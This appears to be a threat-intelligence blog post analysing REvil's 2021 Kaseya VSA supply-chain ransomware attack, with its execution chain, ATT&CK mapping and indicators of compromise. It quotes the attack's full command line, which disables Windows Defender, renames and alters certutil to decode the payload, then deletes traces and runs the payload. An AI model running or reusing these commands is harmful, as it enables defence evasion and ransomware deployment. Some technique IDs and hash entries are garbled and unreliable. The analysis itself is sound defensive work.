Kaseya VSA Supply Chain Ransomware Incident

On 02 July 2021, Kaseya, an IT solutions developer catering to managed service providers (MSPs), disclosed that they were the victim of a large-scale ransomware attack. The attack, which was propagated by the popular RaaS group REvil, targeted Kaseya’s VSA infrastructure, compromising its supply chains. The ransomware group exploited a specific zero-day authentication vulnerability in the application to upload a malicious Base64 encoded file, infecting client infrastructure that has a VSA agent program running on the target servers.

Supply Chain Delivery Vector

Kaseya’s VSA is a Remote Monitoring and Management (RMM) software that enables MSPs to perform patch management, backups, and client monitoring for customers. The threat actors leveraged a zero-day authentication bypass vulnerability in the web interface of VSA, to gain an authenticated session, upload payload, and execute a series of commands via SQL to gain command execution. The ransomware was delivered as a software update masquerading as “Kaseya VSA Agent Hot-fix.” This procedure deployed an encryptor, which compromised the VSA server and was dropped in TempPath, under the filename “agent.crt.”

The payload file “agent.crt” is sent to an agent monitor program (C:\PROGRAM FILES (X86)\KASEYA\<ID>\AGENTMON.EXE, where ID is identification key for the server connected to the monitor instance), which monitors customer endpoints and determines if a terminal requires patching or updates, only to install them silently in the background. The agent monitor then writes “agent.crt” to the VSA agent working directory (C:\KWORKING\AGENT.crt).

"C:\WINDOWS\system32\cmd.exe" /c ping 127.0.0.1 -n 4979 > nul &
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Set-MpPreference -DisableRealtimeMonitoring $true -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend & copy /Y C:\Windows\System32\certutil.exe
C:\Windows\cert.exe & echo %RANDOM% >> C:\Windows\cert.exe & C:\Windows\cert.exe -decode c:\kworking\agent.crt c:\kworking\agent.exe & del /q /f c:\kworking\agent.crt C:\Windows\cert.exe & c:\kworking\agent.exe

Execution

The following command is used to delay or disable the execution of PowerShell commands:

"C:\WINDOWS\system32\cmd.exe" /c ping 127.0.0.1 -n 4979 > nul

Followed by which, a PowerShell command is executed by the Agent monitor, as shown below:

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Set-MpPreference 

  • DisableRealtimeMonitoring $true
  • DisableIntrusionPreventionSystem $true 
  • DisableIOAVProtection $true 
  • DisableScriptScanning $true 
  • EnableControlledFolderAccess Disabled 
  • EnableNetworkProtection AuditMode -Force 
  • MAPSReporting Disabled 
  • SubmitSamplesConsent NeverSend

These commands disable various protections implemented on the target system, specifically features of Windows Defender, such as network protection, IOfficeAntiVirus (IOAV), script scanning, MAPS Reporting, etc.

The following command creates a copy of the “certutil.exe” file, a certificate management utility present in all Windows versions, from the default location to Windows Directory and renames it as “cert.exe”: 

copy /Y C:\Windows\System32\certutil.exe C:\Windows\cert.exe

This command-line appends random data to the end of cert.exe to change its signature, which helps to evade anti-malware security products:

echo %RANDOM% >> C:\Windows\cert.exe

The next command decodes the “agent.crt” file to “agent.exe”:

C:\Windows\cert.exe -decode c:\kworking\agent.crt c:\kworking\agent.exe 

Followed by which, this command line cleans up the file and executes “agent.exe”:

del /q /f c:\kworking\agent.crt C:\Windows\cert.exe & c:\kworking\agent.exe

Agent.exe: The Dropper

Agent.exe is a dropper that downloads the following artifacts:

Artifacts Description
MsMpEng.exe Windows Defender component signed by Microsoft
Mpsvc.dll Part of MsMpEng.exe

REvil uses a particular version of “MsMpEng.exe,” which is vulnerable to Dynamic-link library (DLL) sideloading, which is a popular cyber attack method that takes advantage of how applications handle DLL files. It uses malicious DLL files instead of legitimate ones, which is then loaded and executed, infecting the target server.

Deployment of Ransomware Locker

A Ransomware Locker is hidden in the “mpsvc.dll” file and is executed when “MsMpEng.exe” is executed by the file “agent.exe”. This is an evasion tactic employed by the threat actor to bypass security checks.

MITRE ATT&CK Tactics and Techniques

Initial Access T1059.002 Supply Chain Compromise: Compromise Software Supply Chain
Execution T1059.001 Command and Scripting Interpreter: PowerShell
Persistence & Privilege Escalation T1574.002 Hijack Execution Flow: DLL Side-Loading
Defence Evasion T1036.003 Masquerading: Rename System Utilities
T1562.001 Impair Defenses: Disable or Modify Tools
T1140 Deobfuscate/Decode Files or Information
T1574.002 Hijack Execution Flow: DLL Side-Loading
T1070.004 Indicator Removal on Host: File Deletion
T112 Modify Registry
T1553.002 Subvert Trust Controls: Code Signing
Impact T1486 Data Encrypted for Impact
Files C:\kworking\agent.exe (REvil Dropper)

Indicators of Compromise

Type Indicator
  • SHA-256
  • SHA-1
  • MD5
  • d55f983c994caa160ec63a59f6b4250fe67fb3e8c43a388aec60a4a6978e9f1e
  • 5162f14d75e96edb914d1756349d6e11583db0b0
  • 561cffbaba71a6e8cc1cdceda990ead4
  • SHA-256
  • SHA-1
  • MD5
  • df2d6ef0450660aaae62c429610b964949812df2da1c57646fc29aa51c3f031e
  • 682389250d914b95d6c23ab29dffee11cb65cae9
  • 0299e3c2536543885860c7b61e1efc3f
  • SHA-256
  • SHA-1
  • MD5
  • dc6b0e8c1e9c113f0364e1c8370060dee3fcbe25b667ddeca7623a95cd21411f
  • 8118474606a68c03581eef85a05a90275aa1ec24
  • 835f242dde220cc76ee5544119562268
  • SHA-256
  • SHA-1
  • MD5
  • d55f983c994caa160ec63a59f6b4250fe67fb3e8c43a388aec60a4a6978e9f1e
  • 5162f14d75e96edb914d1756349d6e11583db0b05162f14d75e96edb914d1756349d6e11583db0b0
  • 561cffbaba71a6e8cc1cdceda990ead4
  • SHA-256
  • SHA-1
  • MD5
  • 66490c59cb9630b53fa3fa7125b5c9511afde38edab4459065938c1974229ca8
  • 20e3a0955baca4dc7f1f36d3b865e632474add77
  • 5a97a50e45e64db41049fd88a75f2dd2
  • SHA-256
  • SHA-1
  • MD5
  • 81d0c71f8b282076cd93fb6bb5bfd3932422d033109e2c92572fc49e4abc2471
  • 13d57aba8df4c95185c1a6d2f945d65795ee825b
  • be6c46239e9c753de227bf1f3428e271
  • SHA-256
  • SHA-1
  • MD5
  • 1fe9b489c25bb23b04d9996e8107671edee69bd6f6def2fe7ece38a0fb35f98e
  • 3c2b0dcdb2a46fc1ec0a12a54309e35621caa925
  • 18786bfac1be0ddf23ff94c029ca4d63
  • C:\Windows\mpsvc.dll (REvil / Sodinokibi DLL)
  • SHA-256
  • SHA-1
  • MD5
  • 8dd620d9aeb35960bb766458c8890ede987c33d239cf730f93fe49d90ae759dd
  • 656c4d285ea518d90c1b669b79af475db31e30b1
  • a47cf00aedf769d60d58bfe00c0b5421
  • SHA-256
  • SHA-1
  • MD5
  • e2a24ab94f865caeacdf2c3ad015f31f23008ac6db8312c2cbfb32e4a5466ea2
  • e1d689bf92ff338752b8ae5a2e8d75586ad2b67b
  • 7ea501911850a077cf0f9fe6a7518859
  • SHA-256
  • SHA-1
  • MD5
  • d8353cfc5e696d3ae402c7c70565c1e7f31e49bcf74a6e12e5ab044f306b4b20
  • 1bcf1ae39b898aaa8b6b0207d7e307b234614ff6
  • 849fb558745e4089a8232312594b21d2
  • SHA-256
  • SHA-1
  • MD5
  • d5ce6f36a06b0dc8ce8e7e2c9a53e66094c2adfc93cfac61dd09efe9ac45a75f
  • 7895e4d017c3ed5edb9bf92c156316b4990361eb
  • 4a91cb0705539e1d09108c60f991ffcf
  • SHA-256
  • SHA-1
  • MD5
  • cc0cdc6a3d843e22c98170713abf1d6ae06e8b5e34ed06ac3159adafe85e3bd6
  • 45c1b556f5a875b71f2286e1ed4c7bd32e705758
  • 7d1807850275485397ce2bb218eff159
  • SHA-256
  • SHA-1
  • MD5
  • 0496ca57e387b10dfdac809de8a4e039f68e8d66535d5d19ec76d39f7d0a4402
  • c0f569fc22cb5dd8e02e44f85168b4b72a6669c3
  • 040818b1b3c9b1bf8245f5bcb4eebbbc
  • SHA-256
  • SHA-1
  • MD5
  • 8e846ed965bbc0270a6f58c5818e039ef2fb78def4d2bf82348ca786ea0cea4f
  • c2bb3eef783c18d9825134dc8b6e9cc261d4cca7
  • a560890b8af60b9824c73be74ef24a46

C:\Windows\cert.exe

  • SHA256
  • 36a71c6ac77db619e18f701be47d79306459ff1550b0c92da47b8c46e2ec0752

(Note: Using this hash is ineffective since it is a random character added version of the certutil.exe file. You should use behavior-based detection, for example, renaming/copying certutil.exe)
C:\windows\msmpeng.exe

  • SHA-256
  • SHA-1
  • MD5
  • 33bc14d231a4afaa18f06513766d5f69d8b88f1e697cd127d24fb4b72ad44c7a
  • 3d409b39b8502fcd23335a878f2cbdaf6d721995
  • 8cc83221870dd07144e63df594c391d9

(Note: This file is an older version of Windows Defender. It is a legitimate binary, but it is used for malicious purposes by adversaries like other living off the land tools.)
C:\Program Files (x86)\Kaseya\<ID>\AgentMon.exe (Legitimate Kaseya VSA binary used for remote execution)

 

Domains https://github.com/pgl/kaseya-revil-cnc-domains/blob/main/revil-kaseya-cnc-domains.txt
YARA Rules https://github.com/cado-security/DFIR_Resources_REvil_Kaseya/blob/main/IOCs/Yara.rules
Registry Keys HKEY_LOCAL_MACHINE\SOFTWARE\Wow6432Node\BlackLivesMatter

 

 

References

https://www.huntress.com/blog/rapid-response-kaseya-vsa-mass-msp-ransomware-incident

https://www.reddit.com/r/msp/comments/ocggbv/crticial_ransomware_incident_in_progress/

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/kaseya-ransomware-supply-chain

https://news.sophos.com/en-us/2021/07/04/independence-day-revil-uses-supply-chain-exploit-to-attack-hundreds-of-businesses/

https://www.picussecurity.com/resource/blog/revil-sodinokibi-ransomware-kaseya-vsa-msp-supply-chain-attack

Anandeshwar Unnikrishnan
Threat Intelligence Researcher , CloudSEK
Anandeshwar is a Threat Intelligence Researcher at CloudSEK. He is a strong advocate of offensive cybersecurity. He is fuelled by his passion for cyber threats in a global context. He dedicates much of his time on Try Hack Me/ Hack The Box/ Offensive Security Playground. He believes that “a strong mind starts with a strong body.” When he is not gymming, he finds time to nurture his passion for teaching. He also likes to travel and experience new cultures.
This is Alt
Cyber Intelligence Editor, CloudSEK
Total Posts: 2
She is a Cyber Intelligence Editor at CloudSEK. A lawyer by training and a content writer by choice, she prefers to write on matters concerning current affairs, security, and human frailty.
×
Anandeshwar Unnikrishnan
Threat Intelligence Researcher , CloudSEK
Anandeshwar is a Threat Intelligence Researcher at CloudSEK. He is a strong advocate of offensive cybersecurity. He is fuelled by his passion for cyber threats in a global context. He dedicates much of his time on Try Hack Me/ Hack The Box/ Offensive Security Playground. He believes that “a strong mind starts with a strong body.” When he is not gymming, he finds time to nurture his passion for teaching. He also likes to travel and experience new cultures.
Latest Posts
  • Conti-ransomware-whistleblower
  • Domino’s Breach and the Nucleus ransomware attack: More than just isolated incidents?